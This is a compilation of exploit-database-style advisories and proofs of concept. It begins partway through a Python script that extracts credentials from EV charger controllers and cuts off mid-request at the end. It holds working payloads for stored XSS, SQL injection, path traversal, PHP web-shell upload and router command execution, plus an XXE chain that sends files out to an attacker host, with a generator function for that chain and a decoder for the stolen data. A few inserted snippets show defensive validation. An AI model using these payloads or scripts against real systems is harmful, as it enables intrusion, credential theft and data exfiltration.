        print colored('[+] Charge box Protocol: ', 'green') + str(tree.find('.//cbProtocol').text)
        print colored('[+] Charge box certificate: ', 'green') + str(tree.find('.//cbRequireCsClientCertificate').text)
        print colored('[+] Charge box ID: ', 'green') + str(tree.find('.//cbId').text)
        print colored('[+] Charge box Username: ', 'green') + str(tree.find('.//cbUser').text)
        print colored('[+] Charge box password: ', 'green') + str(tree.find('.//cbPassword').text)
        print colored('[+] Charge box OCPP internal port: ', 'green') + str(tree.find('.//cbOcppPortInternal').text)
        print colored('[+] Charge box OCPP public port: ', 'green') + str(tree.find('.//cbOcppPortPublic').text)
        print colored('[+] Charge box use whitelist: ', 'green') + str(tree.find('.//cbUseWl').text)
        print colored('[+] Charge box whitelist first: ', 'green') + str(tree.find('.//cbWlFirst').text)
        print colored('[+] Charge box offline authentication: ', 'green') + str(tree.find('.//cbAuthOffline').text)
        print colored('[+] Charge box internal error retry delay: ', 'green') + str(tree.find('.//cbRetryInternalErr').text)
        print colored('[+] Charge box use OCPP T-Sync: ', 'green') + str(tree.find('.//cbUseOcppTSync').text)
        print colored('[+] Charge box use compression: ', 'green') + str(tree.find('.//cbUseCompression').text)
        print colored('[+] Charge box use partial energy: ', 'green') + str(tree.find('.//cbUsePartialEnergy').text)
        #print colored('[+] Charge box use partial energy meter value: ', 'green') + str(tree.find('.//cbUsePartialEnergyMeterVal').text)
        print colored('[+] Charge box stop if unauthenticated: ', 'green') + str(tree.find('.//cbStopIfUnauth').text)
        print colored('[+] Charge box stop if concurrent tx: ', 'green') + str(tree.find('.//cbStopIfConcurrentTx').text)
        print colored('[+] Charge box heart-beat interval: ', 'green') + str(tree.find('.//cbHbInterval').text)
        print colored('[+] Charge box connection time out interval: ', 'green') + str(tree.find('.//cbConnTimeOut').text)
        print colored('[+] Charge box meter interval: ', 'green') + str(tree.find('.//cbMeterInterval').text)
        #print colored('[+] Charge box public Ip timeout interval: ', 'green') + str(tree.find('.//cbPublicIpTimeOut').text)
        #print colored('[+] Charge box authentication required for remote start: ', 'green') + str(tree.find('.//cbRequireAuthRemoteStart').text)
        #print colored('[+] Charge box meter requires power: ', 'green') + str(tree.find('.//cbMeterValRequiresPower').text)
        print colored('[*] Processing Powerstudio engine settings file', 'blue')
        print colored('[+] Powerstudio engine host: ', 'green') + str(tree.find('.//pwStdHost').text)
        print colored('[+] Powerstudio engine port: ', 'green') + str(tree.find('.//pwStdPort').text)
        print colored('[+] Powerstudio engine username: ', 'green') + str(tree.find('.//pwStdUser').text)
        print colored('[+] Powerstudio engine password: ', 'green') + base64.b64decode(str(tree.find('.//pwStdPassword').text))
        print colored('[+] Powerstudio engine username (with edit permissions): ', 'green') + str(tree.find('.//pwStdUserEdit').text)
        print colored('[+] Powerstudio engine password (with edit permissions): ', 'green') + base64.b64decode(str(tree.find('.//pwStdPasswordEdit').text))
        print colored('[*] Processing powerstudio application parameters', 'blue')
        print colored('[+] Powerstudio application port: ', 'green') + str(tree.find('.//pssPort').text)
        print colored('[+] Powerstudio application admin: ', 'green') + str(tree.find('.//pssAdminUser').text)
        print colored('[+] Powerstudio application password: ', 'green') + base64.b64decode(str(tree.find('.//pssAdminPassword').text))
        print colored('[+] Powerstudio application debug logging level: ', 'green') + str(tree.find('.//pssLoglevel').text)
    else:
        print colored('[-] Unable to retrieve the OCPP config file', 'red')


# entrypoint
url = raw_input('Insert target ip: ')
target1 = 'http://' + url
target2 = 'http://' + url + ':8080'
luser80 = 'admin'
lpasswd80 = '1234'
luser8080 = 'admin'
lpasswd8080 = '1234'
luser80 = raw_input('Insert username for login at circarlife server: (b to bruteforce)')
if (luser80 == 'b'):
    lbrute()
else:
    lpasswd80 = raw_input('Insert password for login at circarlife server: ')
    luser8080 = raw_input('Insert username for login at OCPP server: ')
    lpasswd8080 = raw_input('Insert password for login at OCPP server: ')
versiones = lversionessoft()
plcs = ldevstat()
ruta = repository()
hard = lversioneshard()
log = logdetails()
setup = lsetup(luser80.strip(), lpasswd80.strip())
config = lconfig(luser8080.strip(), lpasswd8080.strip())
salida(versiones, plcs, ruta, hard, log, setup, config)
# Exploit Title: Cipi Control Panel 3.1.15 - Stored Cross-Site Scripting (XSS) (Authenticated)
# Date: 24.02.2022
# Exploit Author: Fikrat Ghuliev (Ghuliev)
# Vendor Homepage: https://cipi.sh/ <https://www.aapanel.com/>
# Software Link: https://cipi.sh/ <https://www.aapanel.com/>
# Version: 3.1.15
# Tested on: Ubuntu
When a user adds a new server from the "Server" panel, the "name" parameter
is stored without any filtering, so markup placed in it is later rendered back to other users.
POST /api/servers HTTP/1.1
Host: IP
Content-Length: 102
Accept: application/json
X-Requested-With: XMLHttpRequest
Authorization: Bearer
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36
(KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Content-Type: application/json
Origin: http://IP
Referer: http://IP/servers
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close
{
"name":"\"><script>alert(1337)</script>",
"ip":"10.10.10.10",
"provider":"local",
"location":"xss test"
}
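The fix for a stored XSS like this lives in two places: validation at the API boundary and entity encoding at the point of output. The block below is an added example written for this page, not Cipi's code; it reuses the advisory's JSON body as a constructed request and makes no assumption about Cipi's internals. `SERVER_NAME_RE`, `render_row_vulnerable`, `render_row_safe` and `validate_server_request` are my names, and the allowed-character set for a server name is my choice.

```python
"""Stored-XSS hardening for a server 'name' field: allowlist on input,
HTML-entity encoding on output.  Added example; request body is constructed."""
import html
import ipaddress
import json
import re

# Constructed request body, mirroring the POST /api/servers payload above
REQUEST_BODY = json.dumps({
    "name": "\"><script>alert(1337)</script>",
    "ip": "10.10.10.10",
    "provider": "local",
    "location": "xss test",
})

# Assumed policy: a server name is 1-63 chars of letters, digits, space, dot,
# underscore or hyphen, and must start with a letter or digit.
SERVER_NAME_RE = re.compile(r"^[A-Za-z0-9][A-Za-z0-9 ._-]{0,62}$")


def render_row_vulnerable(server):
    # Stored value interpolated straight into HTML: the injected markup executes.
    return "<tr><td>%s</td><td>%s</td></tr>" % (server["name"], server["ip"])


def render_row_safe(server):
    # Every untrusted value is entity-encoded (including quotes) at output time.
    return "<tr><td>%s</td><td>%s</td></tr>" % (
        html.escape(str(server["name"]), quote=True),
        html.escape(str(server["ip"]), quote=True),
    )


def validate_server_request(body):
    """Return the list of field names that fail validation (empty list means accept)."""
    data = json.loads(body)
    errors = []
    if not SERVER_NAME_RE.match(str(data.get("name", ""))):
        errors.append("name")
    try:
        ipaddress.ip_address(str(data.get("ip", "")))
    except ValueError:
        errors.append("ip")
    return errors


if __name__ == "__main__":
    server = json.loads(REQUEST_BODY)
    print("rejected fields:", validate_server_request(REQUEST_BODY))
    print("unsafe:", render_row_vulnerable(server))
    print("safe:  ", render_row_safe(server))
```

Both layers matter: the allowlist stops the payload from ever being stored, and the output encoding protects rows that were stored before the validation existed or that reach the template through some other path.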
Cimetrics BACstac Routing Service 6.2f Local Privilege Escalation
Vendor: Cimetrics, Inc.
Product web page: https://www.cimetrics.com
Affected version: 6.2f
Summary: BACstac is Cimetrics' BACnet(TM) protocol stack and networking software.
In the vendor's words: Cimetrics is excited to announce a new version of our
industry-leading BACnet protocol stack, BACstac 6.8. The Cimetrics BACstac saves
man-years of development when your company needs to create a BACnet solution. Our
software team has created a set of BACnet libraries which greatly simplify the task
of interfacing to BACnet. Even the largest companies in the HVAC industry use our
code, because keeping up with the ongoing changes taking place in the BACnet
committees is a very complex and time-consuming task; for example, many hundreds of
protocol modifications, requirements and enhancements have taken place in just the
past year. By purchasing the Cimetrics BACstac solution, we do the compatibility
coding and testing, which typically saves man-years of software developer time
every year.
Desc: The application suffers from an unquoted search path issue impacting the
service 'bacstac' (bacstac-gtw.exe), installed on Windows as part of the BACstac
routing service. The image path C:\Program Files (x86)\Cimetrics\BACstac v6.2f\bacstac-gtw.exe
is registered without quotes, so Windows resolves it one space-separated prefix at a
time and tries C:\Program.exe, C:\Program Files.exe and
C:\Program Files (x86)\Cimetrics\BACstac.exe before the real binary. This could allow
an authorized but non-privileged local user to execute arbitrary code with elevated
privileges: a successful attempt requires the local user to place an executable at one
of those paths, undetected by the OS or other security applications, where it would be
executed at service start or reboot. The service runs as LocalSystem (see the sc qc
output below), so the planted code would execute with those privileges.
BACstac also provides a named pipe used for IPC connection between a BACstac
application and the BACstac service.
The BACstac Service implements AL multiplexing using a custom IPC mechanism. The
IPC mechanism was chosen to allow portability to embedded systems, and it uses a
fixed number of slots. The slots are recycled when an application stops running.
With Object-based multiplexing, Service requests that identify a particular Object
(e.g. Read-Property) can be forwarded to a dedicated process. A multiplexing server
using an appropriate IPC mechanism (e.g. CORBA, COM, or UDP) can be built on top of
the BACstac API.
A number of BACstac protocol stack run-time configuration parameters are stored
in the Windows Registry. These values are created and initialized when the protocol
stack is installed. The registry entries are not completely removed when the protocol
stack is uninstalled (this is standard behaviour for .INF files). The Registry
entries are located in:
HKEY_LOCAL_MACHINE\SOFTWARE\Cimetrics\BACstac
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\BACstac
The BACstac Service parameters (in ..\Services\BACstac) include plenty of keys,
one of which is the 'Tsml\ConnIpc' key with the default name: \\.\pipe\bacstac.
The vulnerability exists because the pipe is created with improper permissions: the
'Everyone' group is granted full ('F') access, which accesschk reports as RW below, so
any local user can read from and write to the pipe.
Tested on: Microsoft Windows 7 Professional SP1 (EN)
Microsoft Windows 7 Ultimate SP1 (EN)
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5397
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5397.php
13.12.2016
--
C:\>sc qc bacstac
[SC] QueryServiceConfig SUCCESS
SERVICE_NAME: bacstac
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\Program Files (x86)\Cimetrics\BACstac v6.2f\bacstac-gtw.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : BACstac Protocol
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem
C:\>
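An added example (not part of the advisory or of Cimetrics' software) that turns the sc qc output above into the concrete list of paths a low-privileged user would have to control. It parses BINARY_PATH_NAME, reproduces the prefix-by-prefix search CreateProcess performs on an unquoted path, and lists the directories whose ACLs you would then check with icacls or accesschk. The sc output is embedded verbatim as constructed input; function names are this example's own.

```python
import ntpath
import re

# Constructed input: the `sc qc bacstac` output quoted in the advisory above.
SC_QC_OUTPUT = """\
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: bacstac
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\\Program Files (x86)\\Cimetrics\\BACstac v6.2f\\bacstac-gtw.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : BACstac Protocol
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def binary_path(sc_output: str) -> str:
    """Extract BINARY_PATH_NAME from `sc qc <service>` output."""
    m = re.search(r"BINARY_PATH_NAME\s*:\s*(.+)", sc_output)
    if not m:
        raise ValueError("no BINARY_PATH_NAME in sc output")
    return m.group(1).strip()


def is_unquoted_with_spaces(image_path: str) -> bool:
    """True when the image path is not quoted and contains a space, which is
    the precondition for CreateProcess trying shorter prefixes first."""
    return not image_path.startswith('"') and " " in image_path


def hijack_candidates(image_path: str) -> list:
    """Paths CreateProcess tries, in order, before the real image.

    For every space in the unquoted path the prefix up to that space is
    tried with .exe appended. The search stops once a prefix already ends
    in .exe: that is the real image, and what follows it is arguments."""
    if not is_unquoted_with_spaces(image_path):
        return []
    candidates = []
    for i, ch in enumerate(image_path):
        if ch != " ":
            continue
        prefix = image_path[:i]
        if prefix.lower().endswith(".exe"):
            break
        candidates.append(prefix + ".exe")
    return candidates


def dirs_needing_write(candidates: list) -> list:
    """Directories a low-privileged user must be able to write to in order
    to plant one of the candidates; verify their ACLs with icacls/accesschk."""
    return sorted({ntpath.dirname(c) for c in candidates})


if __name__ == "__main__":
    path = binary_path(SC_QC_OUTPUT)
    print("image path :", path)
    for c in hijack_candidates(path):
        print("would try  :", c)
    print("need write :", dirs_needing_write(hijack_candidates(path)))
```

On a default installation C:\ is not writable by standard users, so the interesting candidate is the one under C:\Program Files (x86)\Cimetrics; the advisory does not show that directory's ACL, so that check is yours to make on the target.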
C:\>accesschk.exe \pipe\bacstac
Accesschk v6.02 - Reports effective permissions for securable objects
Copyright (C) 2006-2016 Mark Russinovich
Sysinternals - www.sysinternals.com
\\.\Pipe\bacstac
RW Everyone
C:\>
Cimetrics BACnet Explorer 4.0 XXE Vulnerability
Vendor: Cimetrics, Inc.
Product web page: https://www.cimetrics.com
Affected version: 4.0.0.0
Summary: The BACnet Explorer is a BACnet client application that
helps auto discover BACnet devices.
Desc: BACnetExplorer suffers from an XML External Entity (XXE) vulnerability:
the XML parser resolves DTD parameter entities in the project file without
restriction, so a crafted project file can read arbitrary files on the
affected node and send them to an attacker-controlled host (out-of-band, OOB,
exfiltration). The vulnerability is triggered when input passed to the XML
parser is not sanitized while parsing the XML project file.
Tested on: Microsoft Windows NT 6.1.7601 Service Pack 1
mscorlib.dll: 4.0.30319.34209 built by: FX452RTMGDR
BACstac Library: 1.5.6116.0
BACstac Service: 6.8.3
Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
@zeroscience
Advisory ID: ZSL-2017-5398
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2017-5398.php
30.01.2017
--
Open evil.xml as a project file in BACnet Explorer:
<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE zsl [
<!ENTITY % remote SYSTEM "http://192.168.1.71:8080/xxe.xml">
%remote;
%root;
%oob;]>
xxe.xml on the web server:
<!ENTITY % payload SYSTEM "file:///C:/windows/win.ini">
<!ENTITY % root "<!ENTITY % oob SYSTEM 'http://192.168.1.71:8080/?%payload;'> ">
Serve xxe.xml from the attacker host (192.168.1.71 in this PoC) with a throwaway web server and watch its access log for the callback carrying the file contents:
python -m SimpleHTTPServer 8080
lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1 HTTP/1.1" 301 -
lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1/ HTTP/1.1" 200 -
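An added example (not from the advisory or from Cimetrics) that makes the two halves of the OOB chain above explicit: one function generates evil.xml and the external DTD for any target file and callback host, reproducing the %remote / %root / %oob structure of the PoC, and another decodes the percent-encoded file contents out of the SimpleHTTPServer log line so you can read what came back. The log line is embedded as constructed input copied from above; the `<zsl/>` root element and all function names are this example's own assumptions.

```python
import re
from urllib.parse import unquote


def build_oob_dtd(callback_base: str, target_file: str, dtd_name: str = "xxe.xml") -> tuple:
    """Return (evil_xml, external_dtd) for a parameter-entity OOB exfiltration.

    evil_xml is the document fed to the victim parser; external_dtd is what
    callback_base/dtd_name must serve. In the external DTD %payload reads the
    target file, %root declares %oob with a SYSTEM URL that embeds that
    content, and evil.xml's %oob; reference makes the parser fetch it."""
    evil_xml = (
        '<?xml version="1.0" encoding="UTF-8" ?>\n'
        '<!DOCTYPE zsl [\n'
        f'<!ENTITY % remote SYSTEM "{callback_base}/{dtd_name}">\n'
        '%remote;\n'
        '%root;\n'
        '%oob;]>\n'
        '<zsl/>\n'  # assumed root element so the file is well-formed after the DTD
    )
    external_dtd = (
        f'<!ENTITY % payload SYSTEM "{target_file}">\n'
        f'<!ENTITY % root "<!ENTITY % oob SYSTEM \'{callback_base}/?%payload;\'> ">\n'
    )
    return evil_xml, external_dtd


LOG_LINE_RE = re.compile(r'"GET (?P<path>\S+) HTTP/')


def recover_exfil(log_line: str) -> str:
    """Decode the file contents the victim parser leaked in the callback URL."""
    m = LOG_LINE_RE.search(log_line)
    if not m:
        raise ValueError("not a GET log line")
    _, _, query = m.group("path").partition("?")
    return unquote(query)


def parse_ini(text: str) -> dict:
    """Turn recovered INI text (win.ini here) into {section: {key: value}}."""
    sections, current = {}, None
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1]
            sections[current] = {}
        elif "=" in line and current is not None:
            key, _, value = line.partition("=")
            sections[current][key.strip()] = value.strip()
    return sections


# Constructed sample: the SimpleHTTPServer access-log line from the advisory above.
SAMPLE_LOG = (
    'lab-PC - - [30/Jan/2017 00:47:44] "GET /?%5BMail%5D%0D%0ACMCDLLNAME32=mapi32.dll'
    '%0D%0ACMC=1%0D%0AMAPI=1%0D%0AMAPIX=1%0D%0AMAPIXVER=1.0.0.1%0D%0AOLEMessaging=1 HTTP/1.1" 301 -'
)

if __name__ == "__main__":
    evil, dtd = build_oob_dtd("http://192.168.1.71:8080", "file:///C:/windows/win.ini")
    print("--- evil.xml ---\n" + evil)
    print("--- xxe.xml ---\n" + dtd)
    print("--- recovered ---\n" + recover_exfil(SAMPLE_LOG))
    print(parse_ini(recover_exfil(SAMPLE_LOG)))
```

This channel only carries files whose bytes are legal inside a URL and an entity value: a target containing `<`, `&` or `%` makes the parser error out before the callback, which is why win.ini is the usual first proof.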
# Exploit Title: [CIMA DocuClass Enterprise Content Management - Multiple Vulnerabilities]
# Date: [July 15, 2016]
# Exploit Author: [Karn Ganeshen (ipositivesecurity.blogspot.com)]
# Vendor Homepage: [cima-software.com]
# Version: [app version] (All)
# Tested on: [Microsoft Windows 2008 R2]
DocuClass is a modular and scalable enterprise content management (ECM) solution that allows organizations to streamline internal operations by significantly improving the way they manage their information within a business process.
Vulnerability Details
1. SQL Injection [Post Auth]
PoC
Vulnerable URLs & parameters:
A: POST request
/dcrpcserver.php [parameter - uid]
---
Parameter: uid (POST)
Type: boolean-based blind
Title: PostgreSQL boolean-based blind - Parameter replace
Payload: cmd=searchform&action=getsavedqueries&node=&uid=(SELECT (CASE WHEN (7877=7877) THEN 7877 ELSE 1/(SELECT 0) END))
---
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, PHP 5.2.5
back-end DBMS: Microsoft SQL Server 2008
Impact
An authenticated attacker can read or modify data in the application database, execute code, and compromise the host system.
B: GET request
/e-forms/dcformsserver.exe?action=createimagepdf&documentid=1408648&userid=755 [parameter - userid]
2. Access Control Flaws
DocuClass web application does not enforce strict access control.
PoC:
http://IP/medical_records/0000001337/0000000000123456.pdf
Dump all the documents with a bit of scripting.
Impact
An unauthenticated user can access stored documents by directly calling the document url.
3. Cross-Site Scripting
DocuClass web application lacks strong input validation, and multiple urls & parameters are vulnerable to cross-site scripting (CWE-79) attacks.
/e-forms/dcformsserver.exe [action parameter]
/e-forms/dcformsserver.exe [documentid parameter]
/e-forms/dcformsserver.exe [userid parameter]
/reports_server.php [cmd parameter]
/reports_server.php [reportid parameter]
/reports_server.php [uid parameter]
Impact
An attacker may be able to execute arbitrary scripts/code in the context of the user's browser.
+++++
####################################################################
#
# Exploit Title: CIK Telecom VoIP router SVG6000RW Privilege Escalation and Command Execution
# Date: 2014/12/10
# Exploit Author: Chako
# Vendor Homepage: https://www.ciktel.com/
#
####################################################################
Description:
The CIK Telecom VoIP router SVG6000RW has a privilege escalation vulnerability that
leads to command execution: the administrative command page is served to a normal
user who requests it directly.
Exploit:
1) Log in as a normal user (default username: User, password: cikvoip).
2) Change the URL to http://URL/adm/system_command.asp; the page is served to the
low-privileged user and lets you run commands.
Example:
Command: ls /etc_rw/web
Result:
internet
cgi-bin
homemode_conf.asp
menu-en.swf
wireless
md5.js
hotelmode_conf.asp
waitAndReboot.asp
graphics
menu.swf
getMac.asp
quickconfig.asp
javascript
firewall
home.asp
customermode_conf.asp
wait.asp
station
login.asp
main.css
overview.asp
style
voip
lang
wps
usb
adm
# Exploit Title: Cibele Thinfinity VirtualUI 2.5.41.0 - User Enumeration
# Date: 13/12/2021
# Exploit Author: Daniel Morales, IT Security Team - ARHS Spikeseed
# Vendor Homepage: https://www.cybelesoft.com
# Software Link: https://www.cybelesoft.com/thinfinity/virtualui/
# Version: vulnerable < v3.0
# Tested on: Microsoft Windows
# CVE: CVE-2021-44848
How it works: by requesting the vector below, an attacker can determine whether a username exists from the message returned; the message may be in different languages depending on the VirtualUI configuration. Common usernames to try are administrator, admin, guest and so on.
Payload: The vulnerable vector is "https://example.com/changePassword?username=USERNAME", where "USERNAME" is brute-forced from a wordlist.
Reference: https://github.com/cybelesoft/virtualui/issues/1
# Exploit Title: CI User Login and Management 1.0 - Arbitrary File Upload
# Dork: N/A
# Date: 2018-10-30
# Exploit Author: Ihsan Sencan
# Vendor Homepage 1: http://www.webprojectbuilder.com/item/user-login-and-management
# Vendor Homepage 2: https://sourceforge.net/projects/user-management-system/
# Software Link 1: https://kent.dl.sourceforge.net/project/php-user-login-management/PHP_CI_user_login_and_management-1.zip
# Software Link 2: https://netix.dl.sourceforge.net/project/user-management-system/PHP_CI_user_login_and_management-1.zip
# Version: 1.0
# Category: Webapps
# Tested on: WiN7_x64/KaLiLinuX_x64
# CVE: N/A
# POC:
# 1)
# http://localhost/[PATH]/user/add_edit
#
# http://localhost/[PATH]/assets/images/[FILE]
#
POST /[PATH]/user/add_edit HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------212160558019833203481522967977
Content-Length: 727
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="profile_pic"; filename="phpinfo.php"
Content-Type: application/force-download
<?php
phpinfo();
?>
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="fileOld"
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="users_id"
1
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="user_type"
admin
-----------------------------212160558019833203481522967977
Content-Disposition: form-data; name="submit1"
-----------------------------212160558019833203481522967977--
HTTP/1.1 200 OK
Date: Tue, 30 Oct 2018 06:36:42 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Set-Cookie: ci_session=599e598042864923e909b54019831db9d06c116f; expires=Tue, 30-Oct-2018 08:36:42 GMT; Max-Age=7200; path=/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
refresh: 0;url=http://localhost/[PATH]/user/login
Content-Length: 0
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8
GET /[PATH]/assets/images/phpinfo_1540881402.php HTTP/1.1
Host: TARGET
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Cookie: ci_session=599e598042864923e909b54019831db9d06c116f
Connection: keep-alive
HTTP/1.1 200 OK
Date: Tue, 30 Oct 2018 06:37:08 GMT
Server: Apache/2.4.25 (Win32) OpenSSL/1.0.2j PHP/5.6.30
X-Powered-By: PHP/5.6.30
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8
# POC:
# 2)
# http://localhost/[PATH]/user/add_edit
#
<html>
<body>
<form method="post" enctype="multipart/form-data" action="http://localhost/[PATH]/user/add_edit">
<input id="fileUpload" name="profile_pic" type="file"><br>
<input name="fileOld" value="" type="hidden">
<input name="users_id" value="1" type="hidden">
<input name="user_type" value="admin" type="hidden">
<button name="submit1" type="submit">Ver Ayari</button>
</form>
</body>
</html>
source: https://www.securityfocus.com/bid/48672/info
Chyrp is prone to multiple cross-site scripting vulnerabilities, a local file-include vulnerability, an arbitrary file-upload vulnerability, and a directory-traversal vulnerability.
An attacker may leverage these issues to execute arbitrary script code on an affected computer and in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, open or run arbitrary files in the context of the webserver process, and gain access to sensitive information.
Chyrp 2.1 is vulnerable; other versions may also be affected.
C:
The file-type restriction is enforced only on the client: append ;*.php to the SWFUpload file_types list in the script served for the add-photo feather (http://www.example.com/admin/?action=write_post&feather=photo) using an intercepting proxy, and the uploader accepts PHP files.
<script type="text/javascript">
$(function(){
$("#photo").clone().attr("id", "photo_fake").addClass("swfupload_button").insertBefore("#photo")
photo = new SWFUpload({
upload_url : "http://www.example.com/chyrp_v2.0/modules/swfupload/upload_handler.php",
flash_url : "http://www.example.com/chyrp_v2.0/modules/swfupload/lib/swfupload.swf",
post_params: {"PHPSESSID" : "5o3bnghnijk4hlr7vnshi3vb76", "PHPSESSNAME" : "ChyrpSession", "ajax" : "true" },
file_size_limit : "100 MB",
file_types : "*.jpg;*.jpeg;*.png;*.gif;*.bmp;*.php", <-- #MODIFY!
file_types_description : "All Files",
file_queue_error_handler : fileQueueError,
file_dialog_complete_handler : fileDialogComplete,
upload_start_handler : uploadStart,
upload_progress_handler : uploadProgress,
upload_error_handler : uploadError,
upload_success_handler : uploadSuccess,
button_placeholder_id : "photo",
button_width : $("#photo_fake").width(),
button_height : $("#photo_fake").height(),
button_action : SWFUpload.BUTTON_ACTION.SELECT_FILES,
upload_complete_handler : uploadComplete
})
$("#SWFUpload_0")
.css({ position: "absolute", top: $("#photo_fake").offset().top, left: $("#photo_fake").offset().left })
.before('<div id="progress"><div class="back"><div class="fill"></div><div class="clear"></div></div></div>')
})
</script>
source: https://www.securityfocus.com/bid/48672/info
http://www.example.com/?action=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpassword%00
source: https://www.securityfocus.com/bid/48672/info
http://www.example.com/includes/lib/gz.php?file=/themes/../../../../../../../../../etc/passwd
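An added example (not Chyrp's code) of the server-side check the two traversal vectors above are missing. It decodes the parameter exactly once, refuses the NUL byte that the `%00` suffix relies on to truncate the path, treats a leading slash as relative to the web root, collapses `..` segments and only then confirms the result still lies under the base directory. The base directory `/var/www/chyrp`, the benign sample path and the function names are this example's own assumptions; the first two payloads are copied from the advisory.

```python
import posixpath
from urllib.parse import unquote


class TraversalError(ValueError):
    pass


def resolve_under(base: str, user_path: str) -> str:
    """Map a user-controlled path onto a file under base, or raise.

    Order matters: decode percent-encoding exactly once, refuse NUL (the %00
    that truncated C-string paths in old PHP so an appended '.php' vanished),
    treat a leading slash as relative to base, collapse '..' segments, then
    check the result is still inside base. Anything still containing '%'
    after one decode is a literal filename character, so a double-encoded
    separator (%252F) cannot become a '/' here. base must be a real
    directory, not '/'."""
    decoded = unquote(user_path)
    if "\x00" in decoded:
        raise TraversalError("NUL byte in path")
    if "\\" in decoded:
        raise TraversalError("backslash in path")
    relative = decoded.lstrip("/")
    base_norm = posixpath.normpath(base)
    resolved = posixpath.normpath(posixpath.join(base_norm, relative))
    if resolved == base_norm:
        raise TraversalError("empty path")
    if not resolved.startswith(base_norm + "/"):
        raise TraversalError("path escapes base directory")
    return resolved


def check_payloads(base: str, payloads: list) -> dict:
    """Verdict per payload: 'ok: <resolved>' or 'rejected: <reason>'."""
    verdicts = {}
    for p in payloads:
        try:
            verdicts[p] = "ok: " + resolve_under(base, p)
        except TraversalError as e:
            verdicts[p] = "rejected: " + str(e)
    return verdicts


# Constructed inputs: the two traversal payloads from the advisory above, a
# double-encoded variant, and a benign theme asset.
PAYLOADS = [
    "..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpassword%00",
    "/themes/../../../../../../../../../etc/passwd",
    "..%252F..%252Fetc%252Fpasswd",
    "themes/default/style.css",
]

if __name__ == "__main__":
    for payload, verdict in check_payloads("/var/www/chyrp", PAYLOADS).items():
        print(f"{payload}\n    {verdict}")
```

The double-encoded payload is accepted as a literal filename, which is the correct outcome as long as nothing downstream decodes the string a second time; if the application does, move this check after the last decode.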
source: https://www.securityfocus.com/bid/48672/info
http://www.example.com/includes/javascript.php?action=[XSS]
source: https://www.securityfocus.com/bid/48672/info
http://www.example.com/admin/help.php?title=[XSS]&body=[XSS]
# Chyrp 2.5.2 - Stored Cross-Site Scripting (XSS)
# Date: 2024-04-24
# Exploit Author: Ahmet Ümit BAYRAM
# Vendor Homepage: https://github.com/chyrp/
# Software Link: https://github.com/chyrp/chyrp/archive/refs/tags/v2.5.2.zip
# Version: 2.5.2
# Tested on: MacOS
### Steps to Reproduce ###
- Login from the address: http://localhost/chyrp/?action=login.
- Click on 'Write'.
- Type this payload into the 'Title' field: "><img src=x onerror=alert("Stored")>
- Fill in the 'Body' area and click 'Publish'.
- An alert message saying "Stored" will appear in front of you.
### PoC Request ###
POST /chyrp/admin/?action=add_post HTTP/1.1
Host: localhost
Cookie: ChyrpSession=c4194c16a28dec03e449171087981d11; show_more_options=true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:124.0) Gecko/20100101 Firefox/124.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
